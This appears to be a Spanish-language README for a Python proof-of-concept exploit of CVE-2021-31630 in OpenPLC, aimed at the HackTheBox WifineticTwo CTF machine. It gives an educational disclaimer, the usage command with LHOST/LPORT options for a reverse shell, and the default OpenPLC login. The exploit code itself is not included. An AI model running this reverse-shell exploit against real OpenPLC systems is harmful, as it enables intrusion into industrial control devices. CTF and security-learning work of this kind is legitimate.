
Un script simple en Python para explotar CVE-2021-31630 en HTB WifineticTwo CTF
Este script de Python es un exploit de Prueba de Concepto (PoC) para CVE-2021-31630, dirigido a una vulnerabilidad en OpenPLC que se ejecuta en la máquina WifineticTwo de HackTheBox. Está diseñado únicamente con fines educativos, con el objetivo de demostrar el proceso de explotación en un entorno controlado.
Esta herramienta está destinada únicamente a fines de investigación de seguridad y educativos. El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. El desarrollador no se responsabilizará de ningún daño o cargo penal contra los usuarios que hagan mal uso de este exploit.
Antes de ejecutar este exploit, asegúrate de tener:
requests instalada. Puedes instalarla usando pip install requests.Para usar este exploit, debes especificar la URL del objetivo, la IP del host local (LHOST) y el puerto local (LPORT) al que la shell inversa debe conectarse. Opcionalmente, puedes especificar el nombre de usuario y la contraseña de OpenPLC si difieren de los predeterminados.
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
--target - Dirección base del objetivo. Ejemplo: http://wifinetictwo.htb:8080--lhost - Dirección IP del host local para que la shell inversa se conecte.--lport - Puerto local para que la shell inversa se conecte.--usr - (Opcional) Nombre de usuario para OpenPLC. Por defecto es openplc.--pwd - (Opcional) Contraseña para OpenPLC. Por defecto es openplc.